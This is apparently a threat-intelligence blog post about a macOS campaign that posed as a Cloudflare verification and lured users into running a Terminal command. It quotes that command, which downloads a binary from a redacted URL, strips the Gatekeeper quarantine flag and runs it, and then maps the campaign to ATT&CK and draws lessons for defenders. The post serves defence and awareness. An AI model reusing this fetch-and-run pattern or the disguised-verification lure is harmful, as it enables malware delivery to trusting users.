Operation L2J4: macOS Malware Disguised as a Cloudflare Verification

Written By Trae Morris

Posted by Trae Morris | Cybersecurity Professional

Summary

Operation L2J4 uncovered a clever macOS-targeted malware campaign disguised as a routine security verification process. Victims were led to a site pretending to be part of a Cloudflare check, which instructed them to execute a shell script — a move that silently opened the door to system compromise.

This post summarizes the threat campaign and what defenders should look out for.

The Setup: Social Engineering Meets Terminal Commands

Users landed on a phishing site that posed as a legitimate security gate. They were prompted to open Terminal and run a script that looked like this:


`curl -o /tmp/update [REDACTED_URL]/update && \

xattr -c /tmp/update && \

chmod +x /tmp/update && \

/tmp/update`

   

On execution, this script:

  • Downloaded a binary disguised as a system update.

  • Cleared macOS Gatekeeper warnings via xattr -c.

  • Executed the payload silently with elevated privileges.

What the Malware Did

Post-execution analysis showed signs of:

  • Persistence mechanisms being deployed.

  • Gatekeeper and system protections being bypassed.

  • Unusual network behavior, hinting at either click fraud or a lightweight backdoor.

Infrastructure Observations

While much of the infrastructure was protected by CDN masking, OSINT methods — including certificate transparency lookups — linked the domain to a wider campaign that has appeared in previous low-cost phishing kits.

This wasn’t a one-off.

ATT&CK Mapping

  • T1059.004 – Bash Script Execution

  • T1204.001 – Malicious Link/User Interaction

  • T1036 – Masquerading as a System Utility

  • T1562 – Impairing Defenses

  • T1547 – Startup Persistence

Lessons for Defenders

This operation serves as a strong reminder that:

  • macOS is not immune to targeted social engineering.

  • Terminal-based phishing is a real threat vector, especially among users who trust command-line instructions.

  • Visibility into endpoint behavior post-execution is crucial — don’t just look for malware files, look for altered system states.

Final Thoughts

This campaign stood out not because of its sophistication, but because of how convincingly simple it was. Trusting users, a command that looked harmless, and a false sense of security were all the attackers needed.

Stay skeptical. Stay curious. And always inspect before you execute.


Trae Morris
Previous

Seeking a Mentor in Threat Intelligence